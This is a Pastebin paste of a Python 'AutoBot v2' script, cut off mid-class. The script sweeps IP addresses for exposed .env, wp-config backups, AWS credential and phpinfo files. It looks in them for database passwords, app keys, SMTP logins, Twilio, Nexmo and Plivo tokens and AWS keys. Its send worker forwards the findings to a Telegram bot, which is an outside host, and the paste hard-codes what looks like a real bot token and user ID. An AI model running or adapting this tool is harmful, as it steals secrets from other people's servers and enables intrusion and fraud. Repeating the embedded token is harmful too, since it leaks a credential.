API tools faq
paste
JamesBops

Untitled

JamesBops
Nov 24th, 2023
85
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 38.26 KB | None | 0 0
raw download clone embed print report
  1. from requests.packages.urllib3.exceptions import InsecureRequestWarning
  2. from urllib.parse import urlparse
  3. import threading
  4. import queue
  5. import requests
  6. import re
  7. import time
  8. import struct
  9. import random
  10. import socket
  11. import telebot
  12. import sys
  13. import bs4
  14. import copy
  15.  
  16. requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
  17.  
  18. # ==== EDIT BAGIAN INI ====
  19. env_path = (".env", "app/config/aws-credentials.json", "app/config.php", "app/phpinfo.php", "pinfo.php", "wp-config.php", "p.php", "i.php", "dashboad/phpinfo.php", "app/.env", "app/config/aws-credentials.json", "php/phpinfo", "php-info", "config/web.php", "test.php", "laravel/config/.env", "wp-config.php", "wp-config.php.bak", "wp-config.php.old", "js/config.js", "config/app.php", "config.php", "config/php.ini", "app/config/php.ini", "app/config/config.php", "phalcon/config.php", "config/.env", ".envr", "prod/.env", "root/.env", "laravel/.env", "env.prod", ".env.php", ".envrc", ".gitlab-ci/.env", ".vscode/.env", "twitter/.env", ".s3cfg", ".msmtprc", ".env.development.local", ".docker/laravel/app/.env", "config.json", ".env.development.local", "public/.env", "admin/.env", "api/.env", ".env.bak", ".env.save", ".env.prod", ".envs", ".env.production", "app/config/secrets.yml", "config/config.json", "info.json", "config/database.yml", "config.js", "config/database.yml", "config/secrets.yml", "app/config/config.yml", "app/config/secrets.yml", "app/config/database.yml", ".config/gatsby/config.json", ".cordova/config.json", ".deployment-config.json", ".docker/config.json", ".docker/daemon.json", ".jupyter/jupyter_notebook_config.json", ".lanproxy/config.json", "_wpeprivate/config.json", "console/base/config.json", "console/payments/config.json", "server/config.json", "app/config/config.yml", "secrets.yml", "database.yml", ".env.dev", ".environment", ".env.local", "aws.yml", "config/aws.yml",
  20. "phpinfo", "config/packages/swiftmailer.yml", "app/config/packages/doctrine.yml", ".aws/credentials", "phpinfo.php", "info.php", "wp-config.php.bak", "wp-config.php.old", "wp-config.php-backup", ".wp-config.php.swo", "wp-config.php.swp", ".wp-config.swp", "#wp-config.php#", "backup.wp-config.php", "wp-config", "wp-config - Copy.php", "wp-config copy.php", "wp-config_backup", "wp-config_good", "wp-config-backup", "wp-config-backup.php", "wp-config-backup.txt", "wp-config-backup1.txt", "wp-config-good", "wp-config-sample.php", "wp-config-sample.php.bak", "wp-config-sample.php~", "wp-config.backup", "wp-config.bak", "wp-config.bkp", "wp-config.cfg", "wp-config.conf", "wp-config.data", "wp-config.dump", "wp-config.good", "wp-config.htm", "wp-config.html", "wp-config.inc", "wp-config.local.php", "wp-config.old", "wp-config.old.old", "wp-config.ORG", "wp-config.orig", "wp-config.original", "wp-config.php", "wp-config.php_", "wp-config.php__", "wp-config.php______", "wp-config.php__olds", "wp-config.php_1", "wp-config.php_backup", "wp-config.php_bak", "wp-config.php_bk", "wp-config.php_new", "wp-config.php_old", "wp-config.php_old2017", "wp-config.php_old2018", "wp-config.php_old2019", "wp-config.php_old2020", "wp-config.php_orig", "wp-config.php_original", "wp-config.php-", "wp-config.php-backup", "wp-config.php-bak", "wp-config.php-n", "wp-config.php-o", "wp-config.php-old", "wp-config.php-original", "wp-config.php-save", "wp-config.php-work", "wp-config.php.0", "wp-config.php.1", "wp-config.php.2", "wp-config.php.3", "wp-config.php.4", "wp-config.php.5", "wp-config.php.6", "wp-config.php.7", "wp-config.php.8", "wp-config.php.9", "wp-config.php.a", "wp-config.php.aws", "wp-config.php.azure", "wp-config.php.b", "wp-config.php.backup", "wp-config.php.backup.txt", "wp-config.php.bak", "wp-config.php.bak1", "wp-config.php.bk", "wp-config.php.bkp", "wp-config.php.c", "wp-config.php.com", "wp-config.php.cust", "wp-config.php.dev", "wp-config.php.disabled", "wp-config.php.dist", "wp-config.php.dump", "wp-config.php.html", "wp-config.php.in", "wp-config.php.inc", "wp-config.php.local", "wp-config.php.maj", "wp-config.php.new", "wp-config.php.old", "wp-config.php.org", "wp-config.php.orig", "wp-config.php.original", "wp-config.php.php-bak", "wp-config.php.prod", "wp-config.php.production", "wp-config.php.sample", "wp-config.php.save", "wp-config.php.save.1", "wp-config.php.stage", "wp-config.php.staging", "wp-config.php.swn", "wp-config.php.swo", "wp-config.php.swp", "wp-config.php.tar", "wp-config.php.temp", "wp-config.php.tmp", "wp-config.php.txt", "wp-config.php.uk", "wp-config.php.us", "wp-config.php=", "wp-config.php~", "wp-config.php~~~", "wp-config.php1", "wp-config.phpa", "wp-config.phpb", "wp-config.phpbak", "wp-config.phpc", "wp-config.phpd", "wp-config.phpn", "wp-config.phpnew", "wp-config.phpold", "wp-config.phporiginal", "wp-config.phptmp", "wp-config.prod.php.txt", "wp-config.save", "wp-config.tar", "wp-config.temp", "wp-config.txt", "wp-config.zip", "wp-config~", "wp-configbak", "admin/wp-config.php.bak", "admin/wp-config.php.old", "admin/wp-config.php-backup", ".admin/wp-config.php.swo", "admin/wp-config.php.sadmin/wp", ".admin/wp-config.sadmin/wp", "#admin/wp-config.php#", "backup.admin/wp-config.php", "admin/wp-config", "admin/wp-config - Copy.php", "admin/wp-config copy.php", "admin/wp-config_backup", "admin/wp-config_good", "admin/wp-config-backup", "admin/wp-config-backup.php", "admin/wp-config-backup.txt", "admin/wp-config-backup1.txt", "admin/wp-config-good", "admin/wp-config-sample.php", "admin/wp-config-sample.php.bak", "admin/wp-config-sample.php~", "admin/wp-config.backup", "admin/wp-config.bak", "admin/wp-config.bkp", "admin/wp-config.cfg", "admin/wp-config.conf", "admin/wp-config.data", "admin/wp-config.dump", "admin/wp-config.good", "admin/wp-config.htm", "admin/wp-config.html", "admin/wp-config.inc", "admin/wp-config.local.php", "admin/wp-config.old", "admin/wp-config.old.old", "admin/wp-config.ORG", "admin/wp-config.orig", "admin/wp-config.original", "admin/wp-config.php", "admin/wp-config.php_", "admin/wp-config.php__", "admin/wp-config.php______", "admin/wp-config.php__olds", "admin/wp-config.php_1", "admin/wp-config.php_backup", "admin/wp-config.php_bak", "admin/wp-config.php_bk", "admin/wp-config.php_new", "admin/wp-config.php_old", "admin/wp-config.php_old2017", "admin/wp-config.php_old2018", "admin/wp-config.php_old2019", "admin/wp-config.php_old2020", "admin/wp-config.php_orig", "admin/wp-config.php_original", "admin/wp-config.php-", "admin/wp-config.php-backup", "admin/wp-config.php-bak", "admin/wp-config.php-n", "admin/wp-config.php-o", "admin/wp-config.php-old", "admin/wp-config.php-original", "admin/wp-config.php-save", "admin/wp-config.php-work", "admin/wp-config.php.0", "admin/wp-config.php.1", "admin/wp-config.php.2", "admin/wp-config.php.3", "admin/wp-config.php.4", "admin/wp-config.php.5", "admin/wp-config.php.6", "admin/wp-config.php.7", "admin/wp-config.php.8", "admin/wp-config.php.9", "admin/wp-config.php.a", "admin/wp-config.php.aws", "admin/wp-config.php.azure", "admin/wp-config.php.b", "admin/wp-config.php.backup", "admin/wp-config.php.backup.txt", "admin/wp-config.php.bak", "admin/wp-config.php.bak1", "admin/wp-config.php.bk", "admin/wp-config.php.bkp", "admin/wp-config.php.c", "admin/wp-config.php.com", "admin/wp-config.php.cust", "admin/wp-config.php.dev", "admin/wp-config.php.disabled", "admin/wp-config.php.dist", "admin/wp-config.php.dump", "admin/wp-config.php.html", "admin/wp-config.php.in", "admin/wp-config.php.inc", "admin/wp-config.php.local", "admin/wp-config.php.maj", "admin/wp-config.php.new", "admin/wp-config.php.old", "admin/wp-config.php.org", "admin/wp-config.php.orig", "admin/wp-config.php.original", "admin/wp-config.php.php-bak", "admin/wp-config.php.prod", "admin/wp-config.php.production", "admin/wp-config.php.sample", "admin/wp-config.php.save", "admin/wp-config.php.save.1", "admin/wp-config.php.stage", "admin/wp-config.php.staging", "admin/wp-config.php.swn", "admin/wp-config.php.swo", "admin/wp-config.php.sadmin/wp", "admin/wp-config.php.tar", "admin/wp-config.php.temp", "admin/wp-config.php.tmp", "admin/wp-config.php.txt", "admin/wp-config.php.uk", "admin/wp-config.php.us", "admin/wp-config.php=", "admin/wp-config.php~", "admin/wp-config.php~~~", "admin/wp-config.php1", "admin/wp-config.phpa", "admin/wp-config.phpb", "admin/wp-config.phpbak", "admin/wp-config.phpc", "admin/wp-config.phpd", "admin/wp-config.phpn", "admin/wp-config.phpnew", "admin/wp-config.phpold", "admin/wp-config.phporiginal", "admin/wp-config.phptmp", "admin/wp-config.prod.php.txt", "admin/wp-config.save", "admin/wp-config.tar", "admin/wp-config.temp", "admin/wp-config.txt", "admin/wp-config.zip", "admin/wp-config~", "admin/wp-configbak", "wp-config.php.sav", "wp-config.php.copy", "wp-config.php.tmp", "wp-config.php.txt", "wp-config.php.back", "wp-config.php.zip", "wp-config.php.test", "wp-config.php.tgz", "wp-config.php.temp", "wp-config.php.tar.gz", "wp-config.php.bakup", "wp-config.php.war", "wp-config.php.tar", "wp-config.php.saved", "wp-config.php.sav", "wp-config.php.pas", "wp-config.php.ini", "wp-config.php.jar", "wp-config.php.default", "wp-config.php.db", "wp-config.php.dat", "wp-config.php.core", "wp-config.php.conf",
  21. "wp/wp-config.php.bak", "wp/wp-config.php.old", "wp/wp-config.php-backup", ".wp/wp-config.php.swo", "wp/wp-config.php.swp/wp", ".wp/wp-config.swp/wp", "#wp/wp-config.php#", "backup.wp/wp-config.php", "wp/wp-config", "wp/wp-config - Copy.php", "wp/wp-config copy.php", "wp/wp-config_backup", "wp/wp-config_good", "wp/wp-config-backup", "wp/wp-config-backup.php", "wp/wp-config-backup.txt", "wp/wp-config-backup1.txt", "wp/wp-config-good", "wp/wp-config-sample.php", "wp/wp-config-sample.php.bak", "wp/wp-config-sample.php~", "wp/wp-config.backup", "wp/wp-config.bak", "wp/wp-config.bkp", "wp/wp-config.cfg", "wp/wp-config.conf", "wp/wp-config.data", "wp/wp-config.dump", "wp/wp-config.good", "wp/wp-config.htm", "wp/wp-config.html", "wp/wp-config.inc", "wp/wp-config.local.php", "wp/wp-config.old", "wp/wp-config.old.old", "wp/wp-config.ORG", "wp/wp-config.orig", "wp/wp-config.original", "wp/wp-config.php", "wp/wp-config.php_", "wp/wp-config.php__", "wp/wp-config.php______", "wp/wp-config.php__olds", "wp/wp-config.php_1", "wp/wp-config.php_backup", "wp/wp-config.php_bak", "wp/wp-config.php_bk", "wp/wp-config.php_new", "wp/wp-config.php_old", "wp/wp-config.php_old2017", "wp/wp-config.php_old2018", "wp/wp-config.php_old2019", "wp/wp-config.php_old2020", "wp/wp-config.php_orig", "wp/wp-config.php_original", "wp/wp-config.php-", "wp/wp-config.php-backup", "wp/wp-config.php-bak", "wp/wp-config.php-n", "wp/wp-config.php-o", "wp/wp-config.php-old", "wp/wp-config.php-original", "wp/wp-config.php-save", "wp/wp-config.php-work", "wp/wp-config.php.0", "wp/wp-config.php.1", "wp/wp-config.php.2", "wp/wp-config.php.3", "wp/wp-config.php.4", "wp/wp-config.php.5", "wp/wp-config.php.6", "wp/wp-config.php.7", "wp/wp-config.php.8", "wp/wp-config.php.9", "wp/wp-config.php.a", "wp/wp-config.php.aws", "wp/wp-config.php.azure", "wp/wp-config.php.b", "wp/wp-config.php.backup", "wp/wp-config.php.backup.txt", "wp/wp-config.php.bak", "wp/wp-config.php.bak1", "wp/wp-config.php.bk", "wp/wp-config.php.bkp", "wp/wp-config.php.c", "wp/wp-config.php.com", "wp/wp-config.php.cust", "wp/wp-config.php.dev", "wp/wp-config.php.disabled", "wp/wp-config.php.dist", "wp/wp-config.php.dump", "wp/wp-config.php.html", "wp/wp-config.php.in", "wp/wp-config.php.inc", "wp/wp-config.php.local", "wp/wp-config.php.maj", "wp/wp-config.php.new", "wp/wp-config.php.old", "wp/wp-config.php.org", "wp/wp-config.php.orig", "wp/wp-config.php.original", "wp/wp-config.php.php-bak", "wp/wp-config.php.prod", "wp/wp-config.php.production", "wp/wp-config.php.sample", "wp/wp-config.php.save", "wp/wp-config.php.save.1", "wp/wp-config.php.stage", "wp/wp-config.php.staging", "wp/wp-config.php.swn", "wp/wp-config.php.swo", "wp/wp-config.php.swp/wp", "wp/wp-config.php.tar", "wp/wp-config.php.temp", "wp/wp-config.php.tmp", "wp/wp-config.php.txt", "wp/wp-config.php.uk", "wp/wp-config.php.us", "wp/wp-config.php=", "wp/wp-config.php~", "wp/wp-config.php~~~", "wp/wp-config.php1", "wp/wp-config.phpa", "wp/wp-config.phpb", "wp/wp-config.phpbak", "wp/wp-config.phpc", "wp/wp-config.phpd", "wp/wp-config.phpn", "wp/wp-config.phpnew", "wp/wp-config.phpold", "wp/wp-config.phporiginal", "wp/wp-config.phptmp", "wp/wp-config.prod.php.txt", "wp/wp-config.save", "wp/wp-config.tar", "wp/wp-config.temp", "wp/wp-config.txt", "wp/wp-config.zip", "wp/wp-config~", "wp/wp-configbak", "wordpress/wp-config.php.bak", "wordpress/wp-config.php.old", "wordpress/wp-config.php-backup", ".wordpress/wp-config.php.swo", "wordpress/wp-config.php.swordpress/wp", ".wordpress/wp-config.swordpress/wp", "#wordpress/wp-config.php#", "backup.wordpress/wp-config.php", "wordpress/wp-config", "wordpress/wp-config - Copy.php", "wordpress/wp-config copy.php", "wordpress/wp-config_backup", "wordpress/wp-config_good", "wordpress/wp-config-backup", "wordpress/wp-config-backup.php", "wordpress/wp-config-backup.txt", "wordpress/wp-config-backup1.txt", "wordpress/wp-config-good", "wordpress/wp-config-sample.php", "wordpress/wp-config-sample.php.bak", "wordpress/wp-config-sample.php~", "wordpress/wp-config.backup", "wordpress/wp-config.bak", "wordpress/wp-config.bkp", "wordpress/wp-config.cfg", "wordpress/wp-config.conf", "wordpress/wp-config.data", "wordpress/wp-config.dump", "wordpress/wp-config.good", "wordpress/wp-config.htm", "wordpress/wp-config.html", "wordpress/wp-config.inc", "wordpress/wp-config.local.php", "wordpress/wp-config.old", "wordpress/wp-config.old.old", "wordpress/wp-config.ORG", "wordpress/wp-config.orig", "wordpress/wp-config.original", "wordpress/wp-config.php", "wordpress/wp-config.php_", "wordpress/wp-config.php__", "wordpress/wp-config.php______", "wordpress/wp-config.php__olds", "wordpress/wp-config.php_1", "wordpress/wp-config.php_backup", "wordpress/wp-config.php_bak", "wordpress/wp-config.php_bk", "wordpress/wp-config.php_new", "wordpress/wp-config.php_old", "wordpress/wp-config.php_old2017", "wordpress/wp-config.php_old2018", "wordpress/wp-config.php_old2019", "wordpress/wp-config.php_old2020", "wordpress/wp-config.php_orig", "wordpress/wp-config.php_original", "wordpress/wp-config.php-", "wordpress/wp-config.php-backup", "wordpress/wp-config.php-bak", "wordpress/wp-config.php-n", "wordpress/wp-config.php-o", "wordpress/wp-config.php-old", "wordpress/wp-config.php-original", "wordpress/wp-config.php-save", "wordpress/wp-config.php-work", "wordpress/wp-config.php.0", "wordpress/wp-config.php.1", "wordpress/wp-config.php.2", "wordpress/wp-config.php.3", "wordpress/wp-config.php.4", "wordpress/wp-config.php.5", "wordpress/wp-config.php.6", "wordpress/wp-config.php.7", "wordpress/wp-config.php.8", "wordpress/wp-config.php.9", "wordpress/wp-config.php.a", "wordpress/wp-config.php.aws", "wordpress/wp-config.php.azure", "wordpress/wp-config.php.b", "wordpress/wp-config.php.backup", "wordpress/wp-config.php.backup.txt", "wordpress/wp-config.php.bak", "wordpress/wp-config.php.bak1", "wordpress/wp-config.php.bk", "wordpress/wp-config.php.bkp", "wordpress/wp-config.php.c", "wordpress/wp-config.php.com", "wordpress/wp-config.php.cust", "wordpress/wp-config.php.dev", "wordpress/wp-config.php.disabled", "wordpress/wp-config.php.dist", "wordpress/wp-config.php.dump", "wordpress/wp-config.php.html", "wordpress/wp-config.php.in", "wordpress/wp-config.php.inc", "wordpress/wp-config.php.local", "wordpress/wp-config.php.maj", "wordpress/wp-config.php.new", "wordpress/wp-config.php.old", "wordpress/wp-config.php.org", "wordpress/wp-config.php.orig", "wordpress/wp-config.php.original", "wordpress/wp-config.php.php-bak", "wordpress/wp-config.php.prod", "wordpress/wp-config.php.production", "wordpress/wp-config.php.sample", "wordpress/wp-config.php.save", "wordpress/wp-config.php.save.1", "wordpress/wp-config.php.stage", "wordpress/wp-config.php.staging", "wordpress/wp-config.php.swn", "wordpress/wp-config.php.swo", "wordpress/wp-config.php.swordpress/wp", "wordpress/wp-config.php.tar", "wordpress/wp-config.php.temp", "wordpress/wp-config.php.tmp", "wordpress/wp-config.php.txt", "wordpress/wp-config.php.uk", "wordpress/wp-config.php.us", "wordpress/wp-config.php=", "wordpress/wp-config.php~", "wordpress/wp-config.php~~~", "wordpress/wp-config.php1", "wordpress/wp-config.phpa", "wordpress/wp-config.phpb", "wordpress/wp-config.phpbak", "wordpress/wp-config.phpc", "wordpress/wp-config.phpd", "wordpress/wp-config.phpn", "wordpress/wp-config.phpnew", "wordpress/wp-config.phpold", "wordpress/wp-config.phporiginal", "wordpress/wp-config.phptmp", "wordpress/wp-config.prod.php.txt", "wordpress/wp-config.save", "wordpress/wp-config.tar", "wordpress/wp-config.temp", "wordpress/wp-config.txt", "wordpress/wp-config.zip", "wordpress/wp-config~", "wordpress/wp-configbak", "index.js", "config.js", "config/config.js", "app.js", "config.js", "constant.js", "constants.js", "controller.js", "helper.js", "index.js", "mail.js", "mailer.js", "mailserver.js", "server.js", "utils.js", "admin/app.js", "admin/constant.js", "admin/constants.js", "admin/controller.js", "admin/helper.js", "admin/index.js", "admin/mail.js", "admin/mailer.js", "admin/mailserver.js", "admin/server.js", "admin/utils.js", "admin/config/common.js", "admin/config/constants.js", "admin/config/database.js", "admin/config/template.js", "api/app.js", "api/config.js", "api/constant.js", "api/constants.js", "api/controller.js", "api/helper.js", "api/index.js", "api/mail.js", "api/mailer.js", "api/mailserver.js", "api/server.js", "api/utils.js", "api/controller.js", "api/config/common.js", "api/config/constants.js", "api/config/database.js", "api/config/template.js", "backend/app.js", "backend/config.js", "backend/constant.js", "backend/constants.js", "backend/controller.js", "backend/helper.js", "backend/index.js", "backend/mail.js", "backend/mailer.js", "backend/mailserver.js", "backend/server.js", "backend/utils.js", "backend/config/common.js", "backend/config/constants.js", "backend/config/database.js", "backend/config/template.js", "config/app.js", "config/config.js", "config/constant.js", "config/constants.js", "config/controller.js", "config/helper.js", "config/index.js", "config/mail.js", "config/mailer.js", "config/mailserver.js", "config/server.js", "config/utils.js", "config/common.js", "config/database.js", "config/template.js", "dev/app.js", "dev/config.js", "dev/constant.js", "dev/constants.js", "dev/controller.js", "dev/helper.js", "dev/index.js", "dev/mail.js", "dev/mailer.js", "dev/mailserver.js", "dev/server.js", "dev/utils.js", "dev/config/common.js", "dev/config/constants.js", "dev/config/database.js", "dev/config/template.js", "src/app.js", "src/src.js", "src/constant.js", "src/constants.js", "src/controller.js", "src/helper.js", "src/index.js", "src/mail.js", "src/mailer.js", "src/mailserver.js", "src/server.js", "src/utils.js", "src/config/common.js", "src/config/constants.js", "src/config/database.js", "src/config/template.js", "server/app.js", "server/server.js", "server/constant.js", "server/constants.js", "server/controller.js", "server/helper.js", "server/index.js", "server/mail.js", "server/mailer.js", "server/mailserver.js", "server/server.js", "server/utils.js", "server/config/common.js", "server/config/constants.js", "server/config/database.js", "server/config/template.js", "web/app.js", "web/web.js", "web/constant.js", "web/constants.js", "web/controller.js", "web/helper.js", "web/index.js", "web/mail.js", "web/mailer.js", "web/mailserver.js", "web/server.js", "web/utils.js", "web/config/common.js", "web/config/constants.js", "web/config/database.js", "web/config/template.js", "api/common.js", "api/config/common.js", "API/common.js", "API/config/common.js", "server/helper/aws_s3.js"
  22. "js/config.js", "js/envConfig.js", "env.config.js", "env.js", "config/settings.py", "properties.ini", "/rista/properties.ini", "index.json", "config.json", "config/config.json", "info.json", ".config/gatsby/config.json", ".cordova/config.json", ".deployment-config.json", ".docker/config.json", ".docker/daemon.json", "_environment", "webroot/index.php/_environment",
  23. ".jupyter/jupyter_notebook_config.json", ".lanproxy/config.json", "_wpeprivate/config.json", "console/base/config.json", "console/payments/config.json", "server/config.json", ".env.bak", ".env", "config.env", ".env.dist", ".env.dev", ".env.local", "public/.env", "laravel/.env", "laravel/core/.env", "beta/.env", "kyc/.env", "admin/.env", "prod/.env", ".env.backup", ".env.docker.dev", ".env.php", ".env.prod", ".env.production.local", ".env.sample.php", ".env.save", ".env.stage", ".env.test", ".env.test.local", ".env.local", ".env.production", ".env.staging", "backup/.env", "backup/.env.local", "backup/.env.production", "backup/.env.staging", "public/.env", "public/.env.local", "public/.env.production", "public/.env.staging", "laravel/.env", "laravel/.env.local", "laravel/.env.production", "laravel/.env.staging", "laravel/core/.env", "laravel/core/.env.local", "laravel/core/.env.production", "laravel/core/.env.staging", "beta/.env", "beta/.env.local", "beta/.env.production", "beta/.env.staging", "live/.env", "live/.env.local", "live/.env.production", "live/.env.staging", "demo/.env", "demo/.env.local", "demo/.env.production", "demo/.env.staging", "test/.env", "test/.env.local", "test/.env.production", "test/.env.staging", "kyc/.env", "kyc/.env.local", "kyc/.env.production", "kyc/.env.staging", "admin/.env", "admin/.env.local", "admin/.env.production", "admin/.env.staging", "client/.env", "client/.env.local", "client/.env.production", "client/.env.staging", "user/.env", "user/.env.local", "user/.env.staging", "api/.env", "api/.env.local", "api/.env.staging", "api/.env.production", "apis/.env", "apis/.env.local", "apis/.env.staging", "apis/.env.production", "backend/.env", "backend/.env.local", "backend/.env.staging", "backend/.env.production", "server/.env", "server/.env.local", "server/.env.staging", "server/.env.production", "app/.env", "app/.env.local", "app/.env.staging", "app/.env.production", "project/.env", "project/.env.local", "project/.env.staging", "project/.env.production", "cron/.env", "cron/.env.local", "cron/.env.staging", "cron/.env.production", "crm/.env", "crm/.env.local", "crm/.env.staging", "crm/.env.production", "current/.env", "current/.env.local", "current/.env.staging", "current/.env.production", "dev/.env", "dev/.env.local", "dev/.env.staging", "dev/.env.production", "develop/.env", "develop/.env.local", "develop/.env.staging", "develop/.env.production", "development/.env", "development/.env.local", "development/.env.staging", "development/.env.production", "prod/.env", "prod/.env.local", "prod/.env.staging", "prod/.env.production", "product/.env", "product/.env.local", "product/.env.staging", "product/.env.production", "production/.env", "production/.env.local", "production/.env.staging", "production/.env.production", "portal/.env", "portal/.env.local", "portal/.env.staging", "portal/.env.production", "qa/.env", "qa/.env.local", "qa/.env.staging", "qa/.env.production", "stg/.env", "stg/.env.local", "stg/.env.staging", "stg/.env.production", "staging/.env", "staging/.env.local", "staging/.env.staging", "staging/.env.production", "service/.env", "service/.env.local", "service/.env.staging", "service/.env.production", "services/.env", "services/.env.local", "services/.env.staging", "services/.env.production", "storage/.env", "storage/.env.local", "storage/.env.staging", "storage/.env.production", "old/.env", "old/.env.local", "old/.env.staging", "old/.env.production", "new/.env", "new/.env.local", "new/.env.staging", "new/.env.production", "web/.env", "web/.env.local", "web/.env.staging", "web/.env.production", "website/.env", "website/.env.local", "website/.env.staging", "website/.env.production", "market/.env", "market/.env.local", "market/.env.staging", "market/.env.production", "marketing/.env", "marketing/.env.local", "marketing/.env.staging", "marketing/.env.production", "shop/.env", "shop/.env.local", "shop/.env.staging", "shop/.env.production", "public_html/.env", "public_html/.env.local", "public_html/.env.staging", "public_html/.env.production", "xampp/.env", "xampp/.env.local", "xampp/.env.staging", "xampp/.env.production",
  24. "api/.env", ".docker/.env", ".docker/laravel/app/.env", "env.backup", ".environment", ".envrc", ".envs", ".env~", ".gitlab-ci/.env", ".vscode/.env", "mailer/.env", "twitter/.env", ".env.development.local", ".env", ".env.local", ".env.production", ".env.staging", "backup/.env", "public/.env", "laravel/.env", "config.env", "config/.env", "beta/.env", "live/.env", "lms/.env", "demo/.env", "test/.env", "kyc/.env", "admin/.env", "client/.env", "user/.env", "usr/.env", "api/.env", "apis/.env", "back/.env", "backend/.env", "front/.env", "frontend/.env", "server/.env", "app/.env", "apps/.env", "application/.env", "project/.env", "cron/.env", "current/.env", "dev/.env", "develop/.env", "development/.env", "prod/.env", "product/.env", "production/.env", "portal/.env", "stg/.env", "staging/.env", "service/.env", "services/.env", "storage/.env", "old/.env", "new/.env", "web/.env", "website/.env", "market/.env", "marketing/.env", "media/.env", "node/.env", "nodeapi/.env", "nodeweb/.env", "shop/.env", "public_html/.env", "xampp/.env", "API/.env", "APP/.env", "BACK/.env", "BACKEND/.env", "FRONT/.env", "FRONTEND/.env", "properties.ini", "settings.py", )
  25. keywords = {
  26. "database": [
  27. "DB_CONNECTION", "DB_HOST", "DB_PORT",
  28. "DB_DATABASE", "DB_USERNAME", "DB_PASSWORD"],
  29. "appkey": ["APP_KEY"],
  30. "twilio": [
  31. "TWILIO_ACCOUNT_SID", "TWILIO_API_KEY", "TWILIO_API_SECRET",
  32. "TWILIO_SID", "TWILIO_AUTH_TOKEN", "TWILIO_TOKEN",
  33. "TWILIO_CHAT_SERVICE_SID", "TWILIO_NUMBER"],
  34. "nexmo": [
  35. "NEXMO_KEY", "NEXMO_SECRET", "NEXMO_FROM"],
  36. "plivo": [
  37. "PLIVO_AUTH_ID", "PLIVO_AUTH_TOKEN", "PLIVO_APP_ID"
  38. "PLIVO_ID", "PLIVO_AUTH_TOKEN", "PLIVO_TOKEN", "PLIVO_APP_ID"],
  39. "smtp": [
  40. 'MAIL_HOST', 'MAIL_PORT', 'MAIL_USERNAME', 'MAIL_PASSWORD',
  41. "MAIL_FROM_ADDRESS", "MAIL_FROM_NAME"],
  42.  
  43. "apache": [
  44. "Apache Version", "Server Administrator", "Hostname:Port"
  45. ],
  46. # aws
  47. "aws_access_key": [
  48. "aws_access_key_id", "AKIA[A-Z0-9]{16}", "SES_KEY", "SQS_KEY",
  49. "DYNAMODB_KEY_ID", "DYNAMODB_KEY", "AWS_KEY_ID",
  50. "SNS_KEY", "S3_KEY", "EC2_KEY", "AWS_ACCESS_KEY_ID",
  51. "SES_ACCESS_KEY", "SQS_ACCESS_KEY", "DYNAMODB_ACCESS_KEY"
  52. "SNS_ACCESS_KEY", "S3_ACCESS_KEY", "EC2_ACCESS_KEY"],
  53. "aws_secret_key": [
  54. "aws_secret_access_key", "S3_SECRET", "SNS_SECRET", "AWS_SECRET_ACCESS_KEY",
  55. "SQS_SECRET", "SES_SECRET", "AWS_SECRET_ACCESS_KEY"],
  56. "aws_bucket": ["AWS_BUCKET", "S3_BUCKET"],
  57. "aws_region": ["S3_REGION", "SNS_REGION", "SQS_REGION"],
  58. "aws_url": ["aws_url"],
  59.  
  60.  
  61. # etc
  62. "etc": [
  63. "NEXMO", "NEXMO_KEY",
  64. "SENDGRID",
  65. "AWS_SQS", "SQS_KEY", "SQS_ACCESS_KEY",
  66. "AWS_SNS", "SNS_KEY", "SNS_ACCESS_KEY",
  67. "AWS_S3", "S3_ACCESS_KEY", "S3_KEY",
  68. "AWS_SES", "SES_ACCESS_KEY", "SES_KEY",
  69. "AWS_KEY", "AWS_ACCESS_KEY",
  70. "DYNAMODB", "DYNAMODB_KEY",
  71. "PLIVO",
  72. "smtp.office365",
  73. "smtp.ionos",
  74. "TWILIO", "twilio",
  75. "email-smtp",
  76. "aws_access_key_id",
  77. "SMTP_HOST", "MAIL_USERNAME", "MAIL_PASSWORD"
  78. ]
  79. }
  80.  
  81. TELEGRAM_ACCESS_TOKEN = "6934562918:AAHSnXkizoQeyFb0MyoR3X5k51NssaGa3S8"
  82. USER_ID = 1185096757
  83. UPDATE_INTERVAL_IN_MINUTE = 60
  84. SEND_IN_SECONDS = 1
  85. PRINT_SITE_DOWN = 0
  86.  
  87. # ==== STOP ======
  88.  
  89. client = telebot.TeleBot(TELEGRAM_ACCESS_TOKEN)
  90. xhreg = None
  91.  
  92. try:
  93. client.get_me()
  94. client.get_chat(USER_ID)
  95.  
  96. ch = input("""
  97. \x1b[92m
  98. ___ _ ______ _
  99. / _ \ | | | ___ \ | |
  100. / /_\ \_ _| |_ ___ | |_/ / ___ | |_
  101. | _ | | | | __/ _ \| ___ \/ _ \| __|
  102. | | | | |_| | || (_) | |_/ / (_) | |_
  103. \_| |_/\__,_|\__\___/\____/ \___/ \__|\x1b[0m v2
  104.  
  105. 1. lock head ip
  106. 2. auto
  107.  
  108. ? choose: """.strip("\n"))
  109. assert ch in ["1", "2"]
  110.  
  111. if ch == "1":
  112. xhreg = re.compile(r"^(?:%s)\." % (
  113. "|".join(map(
  114. re.escape, re.split(r"\s*,\s*", input("? input head: "))
  115. ))
  116. ))
  117. thread = int(input("? thread: "))
  118.  
  119. print(("=" * 25) + "\nbot started: " + time.strftime("%c"))
  120. except Exception as e:
  121. exit("Error: " + str(e))
  122.  
  123. # ==== !!!!!!!!! ====
  124.  
  125. s = []
  126. stop = False
  127. total_ = 0
  128.  
  129.  
  130. def send_worker():
  131. start = time.perf_counter()
  132. while not stop or len(s) > 0:
  133. while len(s) > 0:
  134. item = s.pop(0)
  135. client.send_message(USER_ID, item, parse_mode="Markdown")
  136. print("\x1b[92m%s\x1b[0m: message has been sent:\n%s" %
  137. (threading.currentThread().name, item))
  138.  
  139. time.sleep(SEND_IN_SECONDS)
  140.  
  141. end = int(time.perf_counter() - start)
  142. if end % (60 * UPDATE_INTERVAL_IN_MINUTE) == 0:
  143. client.send_message(
  144. USER_ID, "#update: _%s ip successfully processed_" % total_, parse_mode="Markdown")
  145.  
  146.  
  147. # ==== !!!!!!! =====
  148.  
  149. class GrabAnything:
  150. _fn = set()
  151. _soup = {}
  152.  
  153. def __init__(self):
  154. if len(self._fn) < 1:
  155. for fn in dir(self):
  156. if fn.startswith("grab_"):
  157. self._fn.add(getattr(self, fn))
  158.  
  159. def valid(self, s):
  160. if not s:
  161. return ""
  162.  
  163. s = s.strip("\n\"' ")
  164. if s in ("no value", "null", "true"):
  165. return ""
  166. return s
  167.  
  168. @property
  169. def threadName(self):
  170. return threading.currentThread().name
  171.  
